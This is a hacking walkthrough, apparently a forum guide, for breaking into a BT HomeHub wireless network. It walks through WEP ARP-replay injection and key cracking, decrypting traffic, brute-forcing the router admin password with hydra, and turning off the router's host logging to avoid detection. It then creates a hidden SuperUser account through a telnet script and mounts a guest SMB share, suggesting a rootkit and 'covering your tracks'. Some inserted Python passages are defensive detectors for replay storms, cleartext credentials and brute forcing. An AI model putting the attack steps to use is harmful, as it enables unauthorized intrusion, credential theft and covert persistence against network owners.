DISCLAIMER: 1) This guide should not be used illegally. 2) There is no warranty or responsibility associated with this guide or its author. 3) You accept sole responsibility for your actions.
This is my first full hacking guide, so I hope you like it and it works for you in your test lab! If you find a better way to achieve the goals in this guide then please let me know via the forum.
In order to gain access to the network we need to get the access key, and to do this we are going to use a number of tools. The quickest way to collect them all is by downloading the BackTrack live CD.

LIVECD: Backtrack.iso, version 3 (Final), the latest at the time of writing.

Once you have downloaded the ISO, burn it to CD, reboot from the CD, and when you are at a desktop ;) continue with this guide. Are you ready? Log in, fire up X, open a console or three and let's get started.
Now we have airodump-ng collecting packets on channel 6 while filtering out any other AP that may be on the same channel by using the bssid option. This will help keep the file size lower and help my poor little D500 and DWL650 keep up.

OK, so we are all set capturing the packets that are sent over this network, but it's all encrypted using a KEY, so we need to get this KEY if we are to go any further than just sniffing. This is achieved by sniffing for a weak packet and generating a larger number of the weak packets for the cracking process. There are a number of ways to achieve this, but the one we are going to use is a very simple and effective method for testing against a default BTHomeHub with at least one wireless client ;)

aireplay-ng -3 -b 00:18:F6:0B:00:5D -h 00:00:00:00:00:C1 wlan0
The interface MAC (01:01:01:01:01:01) doesn't match the specified MAC (-h).
ifconfig wlan0 hw ether 00:00:00:00:00:C1
Saving ARP requests in replay_arp-0712-012732.cap
You should also start airodump-ng to capture replies.
Read 167179 packets (got 45379 ARP requests), sent 544876 packets...(148 pps)
What should now begin to happen is that the #DATA count for your target network starts to increase quicker and quicker until you are pushing around 100+ packets per second at the AP. This in turn will cause the AP to generate the weak packets that can be collected and cracked using aircrack-ng.

aircrack-ng -n 64 -z /tmp/myhomehub-01.cap
Aircrack-ng 0.9.1

[00:01:08] Tested 80/140000 keys (got 30153 IVs)

KB   depth   byte(vote)
 0   0/  1   16( 173) 3D( 155) 94( 147) 25( 146) 03( 143) 66( 143) 55( 142) 5C( 141) 09( 138) 56( 138) F8( 138) EC( 137) 4B( 136)
 1   6/  8   88( 145) 82( 144) F4( 144) 44( 143) 0E( 142) D8( 142) 81( 139) 07( 138) 1D( 136) 73( 136) 80( 136) 87( 136) F6( 136)
 2   0/  1   D5( 165) 59( 147) 6A( 144) 98( 144) 32( 142) 89( 142) 5D( 141) 74( 140) 1B( 139) 69( 139) 80( 139) 9E( 138) 66( 137)
 3   0/  1   94( 179) 4F( 146) 10( 143) E0( 143) 0A( 142) C7( 139) F1( 139) 1E( 138) 4A( 138) 54( 137) 5F( 137) AB( 137) 02( 136)
 4   0/ 10   71( 145) 8D( 143) D1( 141) 39( 140) 76( 140) C0( 140) CA( 139) 72( 138) 7C( 138) 15( 137) 03( 136) 42( 136) 47( 136)
 5   0/  1   74( 153) 37( 146) 5F( 141) 6F( 141) CE( 138) DD( 137) 90( 136) CD( 136) D3( 136) 24( 135) 45( 134) 94( 134) C6( 134)

KEY FOUND! [ 10:6A:5F:51:A1 ]
To crack the key you are going to need a large number of weak packets; while creating this guide the sniffing process took over 50 minutes and captured over 30000 weak packets. Once the process is complete you can stop [CTRL+C] airodump-ng and aireplay-ng, as we now have the key to authenticate to the network.
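The replay step above is noisy from the AP's side: one transmitter pushing 100+ frames per second, every one of them the same ARP-sized frame carrying the same WEP IV. As an added example (my own code, not part of the original guide), here is the detection logic a wireless IDS could run over frame records to flag that pattern. The WepFrame record, the function names and the sample traffic are all constructed; the BSSID and the spoofed MAC are the ones shown in the guide.

```python
"""Detect an ARP-replay injection storm in WEP data-frame records (wireless IDS logic).

Added example, not from the original guide. WepFrame, build_sample_frames and
detect_replay_storm are my own names; the frame records are constructed, not captured.
"""
from collections import Counter, defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class WepFrame:
    ts: float      # capture time in seconds
    src: str       # transmitter MAC address
    bssid: str     # AP the frame was sent to
    length: int    # frame length in bytes
    iv: int        # 24-bit WEP initialisation vector


def build_sample_frames():
    """Constructed traffic: one normal client, then a replay storm from a spoofed MAC."""
    bssid = "00:18:F6:0B:00:5D"          # the BSSID used in the guide
    frames = []
    t, iv = 0.0, 0x100000
    for i in range(300):                 # ~5 frames/s, varied sizes, fresh IV each time
        frames.append(WepFrame(t, "00:11:22:33:44:55", bssid, 200 + (i * 37) % 900, iv))
        t += 0.2
        iv += 1
    t = 60.0
    for _ in range(1500):                # 150 frames/s, same 68-byte ARP request, same IV
        frames.append(WepFrame(t, "00:00:00:00:00:C1", bssid, 68, 0xABCDEF))
        t += 1 / 150
    return frames


def peak_rate(timestamps, window):
    """Largest number of events inside any sliding window of `window` seconds."""
    peak, j = 0, 0
    for i, ts in enumerate(timestamps):
        while ts - timestamps[j] > window:
            j += 1
        peak = max(peak, i - j + 1)
    return peak


def detect_replay_storm(frames, window=1.0, pps_threshold=100, iv_reuse_threshold=50):
    """Return {src_mac: [reasons]} for transmitters that look like ARP-replay injection.

    Three independent signals, any of which is suspicious on its own:
      * sustained rate at or above pps_threshold frames per window,
      * the same WEP IV transmitted iv_reuse_threshold times or more
        (a legitimate station picks a fresh IV per frame; a replay repeats one),
      * almost every frame from the transmitter has the same length (replayed ARP).
    """
    by_src = defaultdict(list)
    for f in frames:
        by_src[f.src].append(f)
    findings = {}
    for src, fs in by_src.items():
        fs.sort(key=lambda f: f.ts)
        reasons = []
        peak = peak_rate([f.ts for f in fs], window)
        if peak >= pps_threshold:
            reasons.append(f"peak rate {peak} frames per {window:g}s")
        iv, n = Counter(f.iv for f in fs).most_common(1)[0]
        if n >= iv_reuse_threshold:
            reasons.append(f"IV {iv:06X} repeated {n} times")
        size, m = Counter(f.length for f in fs).most_common(1)[0]
        if len(fs) >= pps_threshold and m / len(fs) > 0.9:
            reasons.append(f"{m} of {len(fs)} frames are {size} bytes")
        if reasons:
            findings[src] = reasons
    return findings


if __name__ == "__main__":
    for mac, reasons in detect_replay_storm(build_sample_frames()).items():
        print(mac, "->", "; ".join(reasons))
```

The normal client never trips any of the three checks, while the replaying transmitter trips all of them; in practice the IV-repeat signal is the most reliable, because a real station encrypting live traffic will not reuse one IV hundreds of times inside a few seconds.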
As you can see we have decrypted all the WEP data packets and can have a look inside to see what we can find within the captured data.

ethereal /tmp/myhomehub-01-dec.cap

Once ethereal has loaded the packets we decrypted we can start to identify useful information about the network, its hosts and the services that may be available. Inside the main window there should be lists of IP addresses and host names under the [Source] and [Destination] columns; mine included the following:

192.168.1.253, api.home, 192.168.1.254, 192.168.1.64

This gives us some idea about the hosts on the network and some IPs we can scan for services or entry points into them ;) This time all the information I could find was hosts, but this is always a good place to start after getting a working KEY, as there might be all kinds of useful information within the collected and decrypted data, such as passwords to the AP admin interface. So it's always worth having a read about using the options in ethereal, as you can create filters to locate most of this information without any more interaction with the network than is needed, and you will end up with some hosts to target next.

We have a KEY and have checked the decrypted data, so we can connect to the network. This step is going to leave information about you in the logs: yes, by default the HomeHub logs connections and has a page to display connected hosts. You will be on this after connecting to the network, so get into gear before someone views the page.

ifconfig wlan0 down
iwconfig wlan0 mode managed essid BTHomeHub-9AC1 channel 6 key 10:6A:5F:51:A1
ifconfig wlan0 up
dhcpcd wlan0
ifconfig wlan0 | grep inet
inet addr:192.168.1.65  Bcast:192.168.1.255  Mask:255.255.255.0
inet6 addr: ee86::221:1fc:f301:122/64 Scope:Link
This indicates that we are connected and have an IP address within the range identified from the packet capture and decryption.
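The ethereal step above (listing the hosts in the decrypted capture and filtering for anything sensitive such as admin-interface passwords) can be done without a GUI. As an added example that is not part of the original guide, the following is my own minimal libpcap reader: it walks Ethernet/IPv4/TCP frames, builds the host inventory, and reports any HTTP Basic credential sent in the clear (user name and password length only). The capture it reads is constructed in memory, so it runs offline; the addresses are the ones the guide lists, the client MAC, ports and the "hunter2" password are made up for the sample.

```python
"""Inventory hosts and spot cleartext HTTP Basic credentials in a libpcap file.

Added example, not from the original guide. The capture is constructed in memory
(three Ethernet/IPv4/TCP frames) so that the parser can be run without a real .cap.
"""
import base64
import socket
import struct

ETH_IPV4 = 0x0800
PROTO_TCP = 6


def _frame(src_mac, dst_mac, src_ip, dst_ip, sport, dport, payload=b""):
    """Build one Ethernet/IPv4/TCP frame (checksums left zero; enough for parsing)."""
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 5 << 4, 0x18, 8192, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 1, 0, 64, PROTO_TCP, 0,
                     socket.inet_aton(src_ip), socket.inet_aton(dst_ip)) + tcp
    eth = (bytes.fromhex(dst_mac.replace(":", "")) + bytes.fromhex(src_mac.replace(":", ""))
           + struct.pack("!H", ETH_IPV4))
    return eth + ip


def build_sample_pcap():
    """Constructed capture: a client fetching the hub's admin page with Basic auth."""
    hub, client, other = "192.168.1.254", "192.168.1.64", "192.168.1.253"
    req = (b"GET /cgi/b/lan/ HTTP/1.1\r\nHost: api.home\r\n"
           b"Authorization: Basic " + base64.b64encode(b"admin:hunter2") + b"\r\n\r\n")
    frames = [
        _frame("00:11:22:33:44:55", "00:18:F6:0B:00:5C", client, hub, 40000, 80, req),
        _frame("00:18:F6:0B:00:5C", "00:11:22:33:44:55", hub, client, 80, 40000,
               b"HTTP/1.1 200 OK\r\n\r\n"),
        _frame("00:11:22:33:44:55", "00:18:F6:0B:00:5C", client, other, 40001, 139),
    ]
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)   # global header
    for i, f in enumerate(frames):
        out += struct.pack("<IIII", 1_200_000_000 + i, 0, len(f), len(f)) + f
    return out


def iter_packets(data):
    """Yield raw frames from libpcap bytes, honouring the magic number's byte order."""
    magic, = struct.unpack_from("<I", data, 0)
    if magic == 0xA1B2C3D4:
        endian = "<"
    elif magic == 0xD4C3B2A1:
        endian = ">"
    else:
        raise ValueError("not a libpcap file")
    off = 24
    while off + 16 <= len(data):
        _sec, _usec, incl, _orig = struct.unpack_from(endian + "IIII", data, off)
        off += 16
        yield data[off:off + incl]
        off += incl


def analyse_capture(data):
    """Return (sorted host list, list of cleartext Basic-auth findings)."""
    hosts, findings = set(), []
    for pkt in iter_packets(data):
        if len(pkt) < 34 or struct.unpack_from("!H", pkt, 12)[0] != ETH_IPV4:
            continue
        ihl = (pkt[14] & 0x0F) * 4
        src, dst = socket.inet_ntoa(pkt[26:30]), socket.inet_ntoa(pkt[30:34])
        hosts.update((src, dst))
        if pkt[23] != PROTO_TCP:
            continue
        tcp_off = 14 + ihl
        payload = pkt[tcp_off + ((pkt[tcp_off + 12] >> 4) & 0x0F) * 4:]
        for line in payload.split(b"\r\n"):
            if line.lower().startswith(b"authorization: basic "):
                creds = base64.b64decode(line.split(b" ", 2)[2]).decode(errors="replace")
                user, _, password = creds.partition(":")
                findings.append({"src": src, "dst": dst, "user": user,
                                 "password_length": len(password)})
    return sorted(hosts), findings


if __name__ == "__main__":
    hosts, findings = analyse_capture(build_sample_pcap())
    print("hosts:", hosts)
    for f in findings:
        print(f"cleartext Basic auth {f['src']} -> {f['dst']} user={f['user']!r}")
```

Run it against a real decrypted capture by replacing build_sample_pcap() with the file's bytes. The point for a defender is the second return value: once the WEP key is known, every Basic-auth login to the hub's admin interface is recoverable from the air, which is why the password length is all the report prints.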
Now we have some PORTS on the router that offer some kind of service. The first one to check should be HTTP, as most routers will give up some info without any password, and the HomeHub is one of them: "with a little magic you will discover more, so much more! ;)".
macchanger works, but you can't rely on it; find a card that lets you change the MAC in the firmware to keep the change forever.
Under Wireless, can you spot your host name or MAC address? You have been LOGGED! The good news is that you can remove this entry; in fact you can even disable the service that will do this every time your machine makes a noise. All you need is an account on the router that has the access rights needed to modify services.

If we use Google to find more information about the HomeHub you will stumble across quite a lot of useful information, such as that there is an admin account and that the hub may be vulnerable to "Double-slash Authentication Bypass", but let's just take the fact that the "admin" account is valid and try to obtain the password. We could sniff the traffic and filter the capture for HTTP basic authentication, but waiting for a user to authenticate may be pointless, as most will never connect so long as something is displayed in the web browser! In this guide I would like to demonstrate "hydra".

We have our target host, api.home, and we have a user name, admin. There should be a password file included with Back|Track; if you haven't got one, find one or make one!

cat /pentest/password/dictionaries/wordlist.txt

If we start to build a list of requirements we can soon fill them. All we need is a protected URL? Well, there is a nice little tool called list-urls.py, and providing it with the URL http://api.home reveals a number of links within the main page, such as the one used below to brute force a password for the admin account ;)

./list-urls.py http://api.home
##########################################################
#                                                        #
#           Extract URLS from a web page                 #
#              muts@whitehat.co.il                       #
#                                                        #
##########################################################

/
/
javascript:GoAndRemember('/cgi/b/bb/','')
javascript:GoAndRemember('/cgi/b/telephony/','')
https://service.btbroadbandvoice.bt.com/selfcare/consumerYourAccount
javascript:GoAndRemember('/cgi/b/telephony/', '')
javascript:GoAndRemember('/cgi/b/lan/','')
So now you know the secret default password to all BT HomeHubs, and you can use hydra in other situations!
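A dictionary run like the one hydra performs above leaves a very distinctive trail in a web server's access log: one client address, one protected path, dozens of 401 responses in quick succession, then (if it worked) a 200 on the same path. As an added example that is not from the original guide, here is my own detector for that trail, written over constructed Common Log Format lines; the HomeHub's real log format is not shown on the page, so the line format, the timestamps and the function names are assumptions.

```python
"""Flag HTTP Basic-auth brute forcing in web-server access logs.

Added example, not from the original guide. The log lines are constructed in
Common Log Format with the attempted user in the remote-user field; the
attacker address 192.168.1.65 and the admin URL /cgi/b/lan/ are the ones the guide shows.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Parse one CLF line into a dict, or return None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["status"] = int(rec["status"])
    return rec


def build_sample_log():
    """Constructed log: normal browsing from .64, then a dictionary run from .65."""
    t0 = datetime(2008, 7, 12, 1, 27, 32, tzinfo=timezone.utc)
    lines = []
    for k in range(3):
        ts = (t0 - timedelta(minutes=10 - 3 * k)).strftime(TS_FMT)
        lines.append(f'192.168.1.64 - - [{ts}] "GET / HTTP/1.1" 200 3142')
    for k in range(30):                       # one wrong password per second
        ts = (t0 + timedelta(seconds=k)).strftime(TS_FMT)
        lines.append(f'192.168.1.65 - admin [{ts}] "GET /cgi/b/lan/ HTTP/1.0" 401 401')
    ts = (t0 + timedelta(seconds=31)).strftime(TS_FMT)
    lines.append(f'192.168.1.65 - admin [{ts}] "GET /cgi/b/lan/ HTTP/1.0" 200 5120')
    return lines


def detect_bruteforce(lines, window=timedelta(seconds=60), threshold=10):
    """Return {ip: summary} for clients with >= threshold 401s inside any `window`.

    A 200 on a previously failing path within `window` of the last 401 is reported
    as probable_success, which is the alert worth paging on.
    """
    failures, successes = defaultdict(list), defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["status"] == 401:
            failures[rec["ip"]].append(rec)
        elif rec["status"] == 200:
            successes[rec["ip"]].append(rec)
    alerts = {}
    for ip, fails in failures.items():
        fails.sort(key=lambda r: r["ts"])
        peak, j = 0, 0                          # sliding-window count of 401s
        for i, rec in enumerate(fails):
            while rec["ts"] - fails[j]["ts"] > window:
                j += 1
            peak = max(peak, i - j + 1)
        if peak < threshold:
            continue
        last_fail = fails[-1]["ts"]
        paths = sorted({r["path"] for r in fails})
        probable_success = any(
            s["path"] in paths and timedelta(0) <= s["ts"] - last_fail <= window
            for s in successes.get(ip, [])
        )
        alerts[ip] = {
            "failures": len(fails),
            "peak_in_window": peak,
            "users": sorted({r["user"] for r in fails}),
            "paths": paths,
            "probable_success": probable_success,
        }
    return alerts


if __name__ == "__main__":
    for ip, summary in detect_bruteforce(build_sample_log()).items():
        print(ip, summary)
```

The threshold of ten 401s per minute is deliberately low; a human mistyping a router password rarely manages more than three or four in that time, and a legitimate client that has cached a wrong credential tends to fail on many paths rather than hammer one.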
Follow the "Devices" link to view the list; you will be able to click "edit" or "delete". However, once you click this and your details are removed, you may find yourself listed again by pressing [F5] to refresh your browser! So now you have a problem and need to find the solution.
Let's think for a minute: what were the services listed during our port scan? "telnet" was there on port "23"; let's take a look and see if the admin account works there!

telnet api.home
Trying 192.168.1.254...
Connected to api.home.
Escape character is '^]'.
Username : admin
Password : *****

[THOMSON "BT Home Hub" ASCII-art banner]
BT Home Hub 6.2.2.6
Copyright (c) 1999-2006, THOMSON
-----------------------------------------------------------------------
{admin}=> ?
Like most things in life there is going to be a manual! Where could one be? Well, the first thing to try might be Google, but closer to home you might just type "?":

Following commands are available :

help        : Displays this help information
menu        : Displays menu
?           : Displays this help information
exit        : Exits this shell.
..          : Exits group selection.
saveall     : Saves current configuration.
ping        : Send ICMP ECHO_REQUEST packets.
traceroute  : Send ICMP/UDP packets to trace the ip path.

Following command groups are available :

firewall  dyndns  debug  igmp  mlp  sntp  upnp  service  connection  dns  dsd  eth  atm  adsl
config  env  grp  hostmgr  ids  interface  ip  language  memm  nat  ppp  pptp  script
software  system  systemlog  tls  wireless
From this help information we can launch a menu or continue to just enter the commands via the CLI:
{admin}=>menu
Can you see your details in the listing? Well, you might like to try and remove them using the "delete" command:
{admin}=>hostmgr delete mac_addr YOU:MAC:HERE
However, you will still end up being listed, so what else can we do? Wait a minute, we can set the state of the hostmgr service! Let's try changing the state to disabled:
{admin}=>hostmgr config state disabled
Then remove your details using the delete command, fire up a browser and see if you're listed now; try refreshing the page a few times to check....

Now you are unlisted and you have the admin password for the router; you can make changes to the network configuration and see detailed information about hosts on the network. What's the next step? Well, that is up to you, and as long as it's your equipment you're safe to do as you please; if not, learn to cover your tracks. One trick might be to gain a higher level of access! Yes, the HomeHub has a SuperUser account and you have all the tools you need to gain access to this, so get Google up and running and see what you can find... You might try:
:script add name iwantsuperuser command ="user add name = owned password = somethingeasy role SuperUser descr =me"
:script run name = iwantsuperuser pars=""
If all went well you have now created a new account with SuperUser access to the router, so log in using your new SuperUser account and have a good read of any information you can Google about the router, scripts, accounts etc. The BTHomeHub is now owned; what's the next step? Well, you have now got access to the network and the router's administration console, and you have disabled host logging. What more would you like? Access to the clients on the network! There was one you hammered to gain access to the network in the first place; shall we take a look? What about the other IP, one down from the router: could that be linked somehow?
So the .64 host was down? There is no point running a scan, so let's move on to the next IP.

nmap -sV 192.168.1.253
PORT     STATE  SERVICE      VERSION
139/tcp  open   netbios-ssn  Samba smbd (workgroup: BT)
515/tcp  open   printer      Xerox LPD
MAC Address: 00:18:F6:0B:00:5C (Unknown)
Service Info: Device: broadband router

This looks interesting: we have the same MAC address for both the .253 and .254 devices, which must mean that the router has more than one interface.
Also we can see the .253 device is showing 2 services, one of which is NETBIOS. This is a file sharing based protocol, so maybe we can connect to the remote file system? Let's see what there is on the host using "smbtree":

smbtree -N
BT
    \\THOMSON                 Samba Server
        \\THOMSON\ADMIN$      IPC Service (Samba Server)
        \\THOMSON\IPC$        IPC Service (Samba Server)
        \\THOMSON\BT_7G       USB disk BT_7G
Great, let's create a mount point in our local file system:

mkdir /mnt/BTHUB

and mount the remote share as a guest:

mount -t smbfs -o guest,ip=192.168.1.253,workgroup=BT //THOMSON/BT_7G /mnt/BTHUB
ls /mnt/BTHUB/
AP-Testing-Lesson-1*
We now have a connection to the remote file system that network clients can view. Shall we copy a ROOTKIT onto the device just to see what we catch? Or shall we just break into the last missing client? I am sure you have read enough to gain access to the last client yourself; if not, read this guide again, because I know that you have ;)
Well, here ends my guide. I hope you enjoyed the read and have gained something from it; please feel free to update and distribute it wherever you see fit!